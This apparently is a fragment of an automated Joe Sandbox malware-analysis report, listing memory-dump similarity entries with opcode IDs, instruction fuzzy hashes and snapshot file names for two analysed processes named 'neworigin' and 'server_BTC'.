                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8f7ae44e2609e13d10e6593b32b7430f1d9c6d95566cea64ae7a7bd3a75341e8
                                                                                                                                • Instruction ID: cc7ce91a0fdf19929f5b3b1f97c97d96d76549533ecd53b51e087495713c45be
                                                                                                                                • Opcode Fuzzy Hash: 8f7ae44e2609e13d10e6593b32b7430f1d9c6d95566cea64ae7a7bd3a75341e8
                                                                                                                                • Instruction Fuzzy Hash: 0401D432B100255BDB949669EC157EF76AFEBC8610F000039D90AEB284EE65CC028BE2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c13db03bea64294881276a32508c16f28a4fae3df94829d2828a75e315913b85
                                                                                                                                • Instruction ID: 8f892b1e4724135c2a053dcbae5c00e9fb5dcc80099be4e574af9d40aa44313b
                                                                                                                                • Opcode Fuzzy Hash: c13db03bea64294881276a32508c16f28a4fae3df94829d2828a75e315913b85
                                                                                                                                • Instruction Fuzzy Hash: 4811D3B5D012599FCB00DF9AD884ADEFBF4FB49310F10812AE518A7200C3746544CFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c5af19c9566a8e7f4955605ec1a72f2aedc2b9edce447e3049631c6956a48479
                                                                                                                                • Instruction ID: 6cf2e0c938bd9732e0587f866983cf8d2d07d898191be8239e7969db1c26df94
                                                                                                                                • Opcode Fuzzy Hash: c5af19c9566a8e7f4955605ec1a72f2aedc2b9edce447e3049631c6956a48479
                                                                                                                                • Instruction Fuzzy Hash: 4D01D135B000240BDB65957DE404B2FA3DBDBCA711F20883AE60ECB394DDA5DC424791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fc8accd1ca53375060acc630173420f9780b65ade5d2629a8bd7e32afd96e48e
                                                                                                                                • Instruction ID: ebbee504bcf090d49336016dc09c74a2ba0a9239d66e7531628742930e03193a
                                                                                                                                • Opcode Fuzzy Hash: fc8accd1ca53375060acc630173420f9780b65ade5d2629a8bd7e32afd96e48e
                                                                                                                                • Instruction Fuzzy Hash: 6B01FF31B002150BCBA59ABDF451B2FA7CAEBCA725F108839F60ACB340DE65DC024B81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a8a653ecb26d8b145e78be2d9fb2eb2bc644942edda641dc6c8dfb67e2ba58f3
                                                                                                                                • Instruction ID: 42ecb1028e40f1b328833ccba922d9fb7936a0e31d5d695eb845521df8876fea
                                                                                                                                • Opcode Fuzzy Hash: a8a653ecb26d8b145e78be2d9fb2eb2bc644942edda641dc6c8dfb67e2ba58f3
                                                                                                                                • Instruction Fuzzy Hash: 7B018135B001140BDBA1EA7CE458B2E73D6EBC5715F108838E60ACB394EE22EC468B81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0326519f2cb9adf9eb59f555a3f4cbca0e7bed448751cb777bccdc24481e881a
                                                                                                                                • Instruction ID: efb6f7036c84bf8257b6f3a5213352bc3219d69be5f77892fcf8ae65ce1a8ff2
                                                                                                                                • Opcode Fuzzy Hash: 0326519f2cb9adf9eb59f555a3f4cbca0e7bed448751cb777bccdc24481e881a
                                                                                                                                • Instruction Fuzzy Hash: E3E09270D256886BDF60CBB1E90D74B7FADEB42214FA048E5E408CB146E176D901DB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-2843079600
                                                                                                                                • Opcode ID: fdc477a8f9db52563586e329d8bbdde843dc4deebb5d026ef2afbefeb75831ad
                                                                                                                                • Instruction ID: 6611939f1bbe9778f6f78fcf21f8aeab95adc62186a4633d3c9fe230f7d288d9
                                                                                                                                • Opcode Fuzzy Hash: fdc477a8f9db52563586e329d8bbdde843dc4deebb5d026ef2afbefeb75831ad
                                                                                                                                • Instruction Fuzzy Hash: F9123E30E012198FDB68DF79E894AADB7F6BF88304F208969D509AB355DB309D45CF80
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-1273862796
                                                                                                                                • Opcode ID: b370373f6e3a4b309ee8f9d42d37731c0d9019aa42a3d082210d1dff7ac56daa
                                                                                                                                • Instruction ID: fc9915a4b6a09d2dd0b7f4c214088a4e232c7e2e4d2a14e7f71c622004c17696
                                                                                                                                • Opcode Fuzzy Hash: b370373f6e3a4b309ee8f9d42d37731c0d9019aa42a3d082210d1dff7ac56daa
                                                                                                                                • Instruction Fuzzy Hash: 72918230A00209DFEB68EF65E995B6E77F6FF84301F108829E805AB295DB749D45CF90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-981061697
                                                                                                                                • Opcode ID: 47a784116ee8e97755a9bf51886d8c8d0283460c7243dbc9ba3abb55386d04b3
                                                                                                                                • Instruction ID: b2510b8b38c9d5fdf32352e7ffefa35aa374205127bc42eddb8b0a9dfa50f309
                                                                                                                                • Opcode Fuzzy Hash: 47a784116ee8e97755a9bf51886d8c8d0283460c7243dbc9ba3abb55386d04b3
                                                                                                                                • Instruction Fuzzy Hash: 26F14F30B01209CFDB58EF64E594A6EB7F6FF88300F248468D405AB3A9DB349D46CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-858218434
                                                                                                                                • Opcode ID: 1e455086d13a033eb8c6c2a99df0ec1f57b744fed4dbdbec14693c543c866ef8
                                                                                                                                • Instruction ID: 22881d5d2474388c8d1d11097c2da3f6249b5f3f509ea0a12e201dea2c425575
                                                                                                                                • Opcode Fuzzy Hash: 1e455086d13a033eb8c6c2a99df0ec1f57b744fed4dbdbec14693c543c866ef8
                                                                                                                                • Instruction Fuzzy Hash: B2B13D30A012098FDB54EF69E598A6EB7F6BF84304F248839D406AB355DB75DC86CB81
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LR]q$LR]q$$]q$$]q
                                                                                                                                • API String ID: 0-3527005858
                                                                                                                                • Opcode ID: 8b8c7bedcc47f024cf2257632e88b03a6132d13c81b7787b02f63524eb729970
                                                                                                                                • Instruction ID: 1676a386c43e9912c6d29a193c7cc2eaa00868c0386fd904bd4559e30a09bc79
                                                                                                                                • Opcode Fuzzy Hash: 8b8c7bedcc47f024cf2257632e88b03a6132d13c81b7787b02f63524eb729970
                                                                                                                                • Instruction Fuzzy Hash: 5751B3307002059FDB58EF68E888A6AB7F5FF84710F148968E5069F3A9DB70EC45CB51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-858218434
                                                                                                                                • Opcode ID: 91ea312675720aa09419a5d7d34b878998dd2411dc01585f16ef1880d3b02689
                                                                                                                                • Instruction ID: 5991ba1ab60bac3afdd3736f7b3034e9a96a42e7895b3b3b324cbbc9e00dccbb
                                                                                                                                • Opcode Fuzzy Hash: 91ea312675720aa09419a5d7d34b878998dd2411dc01585f16ef1880d3b02689
                                                                                                                                • Instruction Fuzzy Hash: D4517174A112099FDF65EB68E580AAEB7B6FF84310F108929E805EB355DB30DC41CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c987ed4c6d3ce043db0004a9032293e66d3041403a0b2f1dcd9ba70a11f1966
                                                                                                                                • Instruction ID: 8c20a3a3ac1e2aa6100099325bb8aeb3ec66c821d10954002c3e03408933b9f3
                                                                                                                                • Opcode Fuzzy Hash: 3c987ed4c6d3ce043db0004a9032293e66d3041403a0b2f1dcd9ba70a11f1966
                                                                                                                                • Instruction Fuzzy Hash: F0710270D01219CFCB15EFA4D844AADBBB2FF99304F208569D409BB368DB35698ACF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c6ce2ea441b09d953c48098825da7fe3aa0d76a9e3384b73ac03318727c02ba8
                                                                                                                                • Instruction ID: fbecff527bf96f9fce247738823627946aae21a307a2527afba4491bdb6893ca
                                                                                                                                • Opcode Fuzzy Hash: c6ce2ea441b09d953c48098825da7fe3aa0d76a9e3384b73ac03318727c02ba8
                                                                                                                                • Instruction Fuzzy Hash: CF61D070D01219CFCB14EFA4D990AADBBB2FF99304F208569D4097B368DB35694ACF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 239440acf48d340a8e92c9a90971f2793d4689f0285917822d79f08889de8fb6
                                                                                                                                • Instruction ID: 6382af46f3d967f5c319ad53fa7f1d703cc364616e286282c99fe6cb7ff797e1
                                                                                                                                • Opcode Fuzzy Hash: 239440acf48d340a8e92c9a90971f2793d4689f0285917822d79f08889de8fb6
                                                                                                                                • Instruction Fuzzy Hash: 7361C278A50208CFCB44DFA8D59499DBBF2BF49310F109069E909AB369DB31AC45CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b4e281eabcdf46897eae3fb7d664d90dd439ad377186be3b0e820797a03208af
                                                                                                                                • Instruction ID: 7890034271822c3e03d4b2b009f1317860ba726101b7a36e9f23f3d133be12d9
                                                                                                                                • Opcode Fuzzy Hash: b4e281eabcdf46897eae3fb7d664d90dd439ad377186be3b0e820797a03208af
                                                                                                                                • Instruction Fuzzy Hash: 3541CCB0D002489FDB14DFEAD984AAEFFF6BF99300F24842AE409AB254D7349945CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9ef45090b6d5f32e19e03800620354739baa9b749123566bc53cb878f654f041
                                                                                                                                • Instruction ID: a744d02b4837c9fd6a4526cdde650f43d420210ed748126225cee611a9dbdc08
                                                                                                                                • Opcode Fuzzy Hash: 9ef45090b6d5f32e19e03800620354739baa9b749123566bc53cb878f654f041
                                                                                                                                • Instruction Fuzzy Hash: F641CCB0D002489FDB14DFEAC984A9EFFF6BF99300F24802AE409AB254D7349945CF54
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Jdq
                                                                                                                                • API String ID: 0-1891755625
                                                                                                                                • Opcode ID: 281a9acdd855f429c0937464d048d8bd28ef06912674ce2ec53e74827a39f5ed
                                                                                                                                • Instruction ID: 1c998281a4119289e14d2058d81bf856e364f3e5f3bf0535e41aa47de37a1527
                                                                                                                                • Opcode Fuzzy Hash: 281a9acdd855f429c0937464d048d8bd28ef06912674ce2ec53e74827a39f5ed
                                                                                                                                • Instruction Fuzzy Hash: F141E175E002089FDB08DFA9D594AEEBBF2FF88301F108069E525A73A4DB349945CF94
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Jdq
                                                                                                                                • API String ID: 0-1891755625
                                                                                                                                • Opcode ID: 30344349eb6a00527c8ded6c54eaa9659f3df02b1c63d0353347cb8ee54bd31a
                                                                                                                                • Instruction ID: d0ba8257524628a22e651936861963c62feb4454267bc3a5574523b6c3ea75a0
                                                                                                                                • Opcode Fuzzy Hash: 30344349eb6a00527c8ded6c54eaa9659f3df02b1c63d0353347cb8ee54bd31a
                                                                                                                                • Instruction Fuzzy Hash: 4541C175E002089FCB08DFA9D594AEEBBF2AF89301F108069E515A73A4DB359945CF94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bfa9a67f054b616b4783d38d4f89f3003ea8ba0ac1bad9f6b2118ba24f0d2ef2
                                                                                                                                • Instruction ID: 2ac40509061c04bbc427a26440ec6808b627b99f830a80feacb660397b7807b3
                                                                                                                                • Opcode Fuzzy Hash: bfa9a67f054b616b4783d38d4f89f3003ea8ba0ac1bad9f6b2118ba24f0d2ef2
                                                                                                                                • Instruction Fuzzy Hash: 9FB29E70D11269CFCB69EF64C894AADB7B2BB59304F6085E9D40DAB368DB315E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bdce409377be12cf66d587937e0baf6593309f3070757413dad9404ce18133a4
                                                                                                                                • Instruction ID: 7d3d025007dc85c893df4ee39792583b512118ee6b61b27d02ee269cebad7308
                                                                                                                                • Opcode Fuzzy Hash: bdce409377be12cf66d587937e0baf6593309f3070757413dad9404ce18133a4
                                                                                                                                • Instruction Fuzzy Hash: B6B29F70D11269CFCB69EF64C894AADB7B2BB59304F6085E9D40DAB368DB315E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 788f3eeadff723da24586e2eeb85e2968053e5e2d31771e22d5883eda2601012
                                                                                                                                • Instruction ID: 68f05504c3b2ec9c3485209877d974b2d28c21ae5df92775c73f1a83349ed837
                                                                                                                                • Opcode Fuzzy Hash: 788f3eeadff723da24586e2eeb85e2968053e5e2d31771e22d5883eda2601012
                                                                                                                                • Instruction Fuzzy Hash: 6062BC70A01269CFDB69DF64D894B9DBBB2FB48304F1080A9D41EA7764EB319E85CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 87be73af6604297e743c557b6f40c9dfd8e999b207d63e289ef220abccc4bcef
                                                                                                                                • Instruction ID: 14841ee1917778c813df6b55eb79161bf9ea77d8daac78b864206d568b98307b
                                                                                                                                • Opcode Fuzzy Hash: 87be73af6604297e743c557b6f40c9dfd8e999b207d63e289ef220abccc4bcef
                                                                                                                                • Instruction Fuzzy Hash: C362BC70A01269CFDB69DF64D894B9DBBB2FB48304F1080A9D41EA7764EB319E85CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 763f7bda4491ddf4d0e47a0c3b557ef390a3cde2473727a8704a5ec53456234a
                                                                                                                                • Instruction ID: 2e66cb985b41976df3f2e266b4b6ad5944970821ccd3b9ef20522160e2ac1574
                                                                                                                                • Opcode Fuzzy Hash: 763f7bda4491ddf4d0e47a0c3b557ef390a3cde2473727a8704a5ec53456234a
                                                                                                                                • Instruction Fuzzy Hash: F441F1B0D10248DFDB14DFEAD484AAEFFF5AF99300F24842AE448AB254C7345885CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2681621e579d0ed8632fb52c0789727d3e8a1bbcfb81b50b8dd7e32b56eaa88b
                                                                                                                                • Instruction ID: df1181c23c510cf50e9465cc1256bc6d1627c26b9f7035c4c16862d17e9f1762
                                                                                                                                • Opcode Fuzzy Hash: 2681621e579d0ed8632fb52c0789727d3e8a1bbcfb81b50b8dd7e32b56eaa88b
                                                                                                                                • Instruction Fuzzy Hash: BAB1EC74E01229CFDB64DF68C984B9DBBB2BB49204F1085E9D40DA7354DB70AE89CF52
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1991f7fbf442d64748431ed7f131f917c00e93c0bff9eedc636657bc4d2da9e8
                                                                                                                                • Instruction ID: 4c0198b8d394322443d63d1077baabec0ebc5f0d136a450266a0b49cf992f0c7
                                                                                                                                • Opcode Fuzzy Hash: 1991f7fbf442d64748431ed7f131f917c00e93c0bff9eedc636657bc4d2da9e8
                                                                                                                                • Instruction Fuzzy Hash: 4C61E374A502488FCB48DFA8D994A9DBBF2FF4A310F108069E915AB369DB31AC45CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52cc17b9ff40d381f29c630058763e6637bb299d4e1adf6679d6f507cb477948
                                                                                                                                • Instruction ID: 3a72fa70dc300d76beff22fbc899d2475a1d8e8fadcb40327e99cb5a8a199fcb
                                                                                                                                • Opcode Fuzzy Hash: 52cc17b9ff40d381f29c630058763e6637bb299d4e1adf6679d6f507cb477948
                                                                                                                                • Instruction Fuzzy Hash: EE81B074E10219CFCB54EFA4D894AADBBF2BF59304F2084A9D509AB369DB306D41CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 227945420f7e1cc26e2f04e385b5b48c94900d988aba0b130179bfd894d77df9
                                                                                                                                • Instruction ID: 99018cc4fa27f73fc73925ba51b8622ede63773f6cd84ee7ab8f170e99d1a1f4
                                                                                                                                • Opcode Fuzzy Hash: 227945420f7e1cc26e2f04e385b5b48c94900d988aba0b130179bfd894d77df9
                                                                                                                                • Instruction Fuzzy Hash: 9981BF74E102198FCB54EFB8D894AADBBB2BF59304F6084A9D409AB369DB306D41CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1c0dba4ed69333ec99208cabf4bdbc36f0a9f10e637dbbd8568f8ea5ad64a9c0
                                                                                                                                • Instruction ID: e3f34be5cb084c404aa72aade095481e9522a7bccc0992634fc5553c7edee6c5
                                                                                                                                • Opcode Fuzzy Hash: 1c0dba4ed69333ec99208cabf4bdbc36f0a9f10e637dbbd8568f8ea5ad64a9c0
                                                                                                                                • Instruction Fuzzy Hash: 3A41FE78D14209CFDB04DFE9E4846EDBBF1BB59300F20402AE429AB398EB745946CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 870a3a5bc0176686452521200043cd4fe92604a31cf792d569d10dfc66c5b69c
                                                                                                                                • Instruction ID: c163d1143dee4e5ffe633502cf40385d44d31cb621a9cc71679bfc9f526e4a54
                                                                                                                                • Opcode Fuzzy Hash: 870a3a5bc0176686452521200043cd4fe92604a31cf792d569d10dfc66c5b69c
                                                                                                                                • Instruction Fuzzy Hash: 3741BFB0D1024C9FDB14DFEAD584A9EFFF5AF99300F24802AE419AB254DB745985CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a57936901bd1b188be4986ff3990a207f5e06533554bd887c2009c16712b1923
                                                                                                                                • Instruction ID: 9986f25032949f4fa72e44a7f1eac6bff7e1d9968397eee51745abce2062ec3e
                                                                                                                                • Opcode Fuzzy Hash: a57936901bd1b188be4986ff3990a207f5e06533554bd887c2009c16712b1923
                                                                                                                                • Instruction Fuzzy Hash: F631EE70E012098FCB08DFB4D440AEEB7B2EF89304F60946AD415B7394DB36AD41CB65
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a698aa644011852d3038fd62e75ffd4ea64f799ee21d83374c6289ccf863cfa5
                                                                                                                                • Instruction ID: f33279f039bf332530d1aa0204e58a06a7b9b6b42caea8f29cfb82320656b3d1
                                                                                                                                • Opcode Fuzzy Hash: a698aa644011852d3038fd62e75ffd4ea64f799ee21d83374c6289ccf863cfa5
                                                                                                                                • Instruction Fuzzy Hash: EA21EE70E012098FCB18EBB4D440AEEB7B2EF89304F6094A9D415B7394DB36AD41CB64
